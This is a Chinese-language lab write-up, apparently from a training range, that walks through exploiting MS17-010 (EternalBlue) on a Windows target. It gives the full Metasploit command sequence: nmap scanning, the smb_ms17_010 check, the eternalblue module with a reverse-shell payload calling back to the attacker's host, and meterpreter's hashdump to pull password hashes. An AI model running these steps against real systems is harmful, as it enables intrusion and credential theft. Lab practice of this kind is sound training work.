0x00
我這邊用的是安界網的靶場
http://vnc.ajsafe.com/experi/article/164.html
首先來開啟靶場
關於漏洞的介紹:MS17-010漏洞出現在Windows SMB v1中的內核態函數srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉換時,在大非分頁池(Large Non-Paged Kernel Pool)上存在緩沖區溢出。 函數srv!SrvOs2FeaListToNt在將FEA list轉換成NTFEA(Windows NT FEA) list前會調用srv!SrvOs2FeaListSizeToNt去計算轉換后的FEA lsit的大小,因計算大小錯誤,而導致緩沖區溢出。
0x01漏洞掃描
首先我們來ping一下目標靶機
可以看到是成功的
在來看一下目標機開發的端口
利用工具nmap命令如下
nmap -sV -Pn 192.168.0.2
一定要記住Linux需要區分大小寫
可以看到開放了 135 139 445 端口
我們使用掃描模塊看該漏洞是否可以利用命令如下
msfconsole
這邊可以看到是可以利用的
打開 metasploite 命令行客戶端,使用search命令查找ms17-010漏洞的相關模塊
search ms17-010
使用use命令選擇我們要使用的掃描模塊
use auxiliary/scanner/smb/smb_ms17_010
需要設置目標地址,設置命令:
set RHOSTS 192.168.0.2
然后直接run或者exploit 兩個命令意思相同執行結果一樣
我這邊是直接run
0x02漏洞利用
從上一步驟可以看出,該漏洞是可被利用的,接下來,我們使用漏洞利用模塊
use exploit/windows/smb/ms17_010_eternalblue
查看配置信息,並設置標記為yes的屬性
show options
目標機host地址:192.168.0.2
set RHOSTS 192.168.0.2
之后,選擇載荷payload,也就是shellcode,此處我們選擇回連至控制端shell的payload
配置中缺少本地主機 LHOST,設置一下
set LHOST 192.168.0.3
本地端口LPORT默認為4444,可通過set LPORT 端口號修改
完成配置后,運行exploit或者run,開始執行漏洞利用模塊
0x04遠程登錄目標機
我們已經成功的獲取Session會話了,本次我們繼續介紹meterpreter后滲透模塊的其他功能
運行sysinfo查看目標機器相關信息
sysinfo
中文亂碼問題不打緊不打緊
執行help命令可以幫助我們了解meterpreter有哪些功能
help
接下來,我們獲取目標機hash值
執行hashdump
hashdump
ok了本次內容就到這里希望大家也去練習練習